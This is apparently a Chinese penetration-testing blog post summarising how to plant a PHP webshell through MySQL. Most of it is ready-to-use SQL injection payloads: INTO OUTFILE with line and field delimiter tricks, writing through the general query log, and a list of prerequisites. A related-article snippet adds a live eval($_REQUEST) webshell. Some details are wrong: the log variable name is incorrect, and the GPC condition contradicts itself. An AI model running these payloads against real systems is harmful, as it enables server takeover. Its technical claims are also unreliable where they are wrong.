MySQL 写 WebShell总结

最新推荐文章于 2024-06-05 11:40:11 发布
最新推荐文章于 2024-06-05 11:40:11 发布
阅读量453 收藏 2
点赞数
分类专栏: web渗透 文章标签: mysql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Poolhuang/article/details/124996673
版权

1、写入方式

①、基于outfile写入

union select 

例:?id=1 union select '<?php phpinfo() ?>' into outfile '物理路径' ;

###利用分隔符写入

lines terminated by ::设置每行结尾的字符,可以为单个或多个字符,默认值为‘\n’;可以理解为 以每行终止的位置添加 xx 内容。

例:?id=1 into outfile '物理路径' lines terminated by '<?php phpinfo() ?>';

lines starting by :设置每行开头的字符,可以为单个或多个字符,默认情况下不使用任何字符;可以理解为 以每行开始的位置添加 xx 内容。

例:?id=1 into outfile '物理路径' lines starting by '<?php phpinfo() ?>';

fields terminated by  :设置字符串为字段之间的分隔符,可以为单个或多个字符,默认情况下为制表符‘\t’;可以理解为 以每个字段的位置添加 xx 内容。

例:?id=1 into outfile '物理路径' fields terminated by '<?php phpinfo() ?>';

columns terminated by :设置字符串为字段之间的分隔符,可以为单个或多个字符,可以理解为以每个字段的位置添加 xx 内容。

例:?id=1 into outfile '物理路径' columns terminated by '<?php phpinfo() ?>';

注:secure_file_priv参数是MySQL用来限制数据导入和导出操作的效果,如果这个参数被设为了一个目录名,那么MySQL会允许仅在这个目录中可以执行文件的导入和导出,例如LOAD DATA、SELECT。。。INTOOUTFILE、LOAD_FILE()等。如果这个参数为NULL,MySQL会禁止导入导出操作,但是这只是意味着通过outfile方法写入WebShell是无法成功的,但是通过导出日志的方法是可以的。

②、基于log日志写入

在日志开启前提下,先将日志文件的导出目录修改成Web目录,然后执行了一次简单的WebShell代码查询功能,此时日志文件记录了此过程,这样再Web目录下的日志文件就变成了WebShell。例如,我们先设置日志文件的导出目录:set global general_file = ‘Web目录’;然后执行一遍:select “WebShell代码”;

2、利用条件

·root 权限

·GPC 关闭(能使用单引号),magic_quotes_gpc=On

·有绝对路径(读文件可以不用,写文件必须)

·没有配置–secure-file-priv

·有读写的权限,有 create、insert、select 的权限

Poolhuang
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL数据库webshell
weixin_45253622的博客
03-24 921
MySQL数据库webshell 判断 前提条件: 数据库当前用户为root权限 知道当前网站的绝对路径 PHP的GPC为OFF状态 入的那个路径存在入权限 注意点: secure_file_priv参数 这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。 如果这个参数为空,这个变量没有效果。 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,M
mysql 注入shell_MYSQL存在注入点,WebShell的5种方式 · Manning23
weixin_31953847的博客
01-27 291
很久没更新了,分享一个2017年的笔记。0x00 数据前提1,在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp" 被注释 或者 `secure_file_priv 配置的位置是web目录。2,未开启全局gpc。0x01 环境准备测试语句http://172.16.55.130/work/sqli-1.php?id=1页面显示效果​0x02 ...
玄机靶场 第二章日志分析-mysql应急响应
最新发布
qq_46343633的博客
06-05 1214
1.黑客第一次入的shell flag{关键字符串}2.黑客反弹shell的ip flag{ip}3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx4.黑客获取的权限 flag{whoami后的值}
mysql数据入突然慢了_通过MySQLwebshell的几种方式
weixin_39648824的博客
11-28 305
当我们通过测试发现SQL注入,或拿到像phpMyAdmin之类的web数据库可视化管理工具,并想要进行下一步渗透的时候,可通过数据库webshell到目标服务器上,利用webshell管理工具控制目标服务器。下面将讲述几个通过MySQL数据库webshell的方法,以拿到phpMyAdmin为例。-01-通过outfileshell利用条件:1、root权限2、网站的绝对路径...
如何向mysql入wbeshell
ws1813004226的博客
03-23 889
如何向mysql入wbeshell 一、成功入wbeshell必须满足的4个条件: (1)数据库拥有root权限或拥有file权限。 (2)知道网站的绝对路径。 (3)PHP的GPC参数为OFF状态。 (4)MYSQL中的secure_file_priv参数不能为NULL。 二、入方法 1.使用outfile方法。outfile是mysql提供的一个用来入文件的函数,当我们可以控制入文件的内容以及文件的保存路径时,我们就可以上传一个webshell。 2.基于日志入法。将日志文件的导出目录修改成
通过MySQLwebshell的几种方式(小宇特详解)
小宇的web博客
08-07 5390
通过MySQLwebshell的几种方式 -01-通过outfileshell 利用条件 1.root权限2.网站的绝对路径且具有入权限,能够使用into outfile和into dumpfile来进行入。 这里用了以下的shell union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php' 这里连接蚁剑 -02-将shell入表中 利用条件 1.root权限2.网站
MySQL注入点WebShell的几种方式
热门推荐
04-16 2万+
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
phpmyadmin上传Webshell总结.docx
08-31
PHPMyAdmin是广泛使用的MySQL数据库管理工具,有时会被黑客利用来上传Webshell。以下是对利用PHPMyAdmin上传Webshell的详细总结: 1. **select查询输出Webshell** 这种方法的关键在于`secure_file_priv`的设置。...
WEBSHELL提权方法总结
02-24
### WEBSHELL提权方法总结 #### 一、概述 在网络安全领域,WebShell作为攻击者获取服务器控制权的一种手段,被广泛应用于渗透测试及恶意攻击活动中。提权(Privilege Escalation)是指利用已有的权限进一步获取系统...
Mysql渗透笔记.pdf
01-25
MySQL渗透笔记 MySQL渗透笔记是 MySQL数据库安全...MySQL渗透笔记提供了 MySQL 数据库安全漏洞的利用和防御指南,涵盖目录猜解、获取数据库信息、使用 UNION 进一步注入、上传 WebShell 并执行代码等方面的知识点。
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
Mysqlwebshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3695
Mysqlwebshell
MySQL数据库上传webshell的方法
weixin_42373409的博客
09-15 789
1.into outfile方法 在mysql.ini配置文件中参数secure_file_priv的取值决定了入开关的状态; (1)secure_file_priv=NULL;–>表示入开关关闭; (2)secure_file_priv=“”;–>表示入开关打开; (3)secure_file_priv=“web路径”;–>表示入开关打开,并入指定路径下,如果入路径不是web路径,则无法通过此种方法webshell。 修改该参数只能通过修改mysql.ini完成,命令行无
aspmysqlshell_MySQL注入点webshell的五种方式
weixin_39540018的博客
12-20 77
0x00 数据的前提1,在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。2,未开启全局gpc。(php5.329之后就没有magic_quotes_gpc)0x01 union select 入最常见的入方式,union select 后跟 into outf...
mysql webshell_MySQL注入点WebShell的几种方式
weixin_35370061的博客
01-18 447
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如当面对一个MySQL注入点,通过使用SQLmap的--os-shell命令选项,便可轻松一键获取Webshell,但是非正常退出时,便会在网站目录中存留SQLmap临时上传的Webshell文件。一个MySQL注入点Webshell,...
【getshellMySQL上传webshell
ssrf
10-20 827
文章目录一、select into outfile直接入1、利用条件2、查看secure_file_priv值3、入一句话二、利用全局日志shell1、查看配置2、开启general_log模式3、修改日志目录为shell地址4、shell5、抹除痕迹 一、select into outfile直接入 1、利用条件 对web目录需要有权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secur
SQLmap使用指南:数据库提权与Webshell获取
总结,SQLmap是一个强大的工具,它通过SQL注入技术帮助安全专家和黑客测试系统的安全性,同时也被用于非法活动。了解和掌握这些命令和技巧对于保护和防御网络系统至关重要,同时也能帮助安全专业人员更好地进行渗透...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值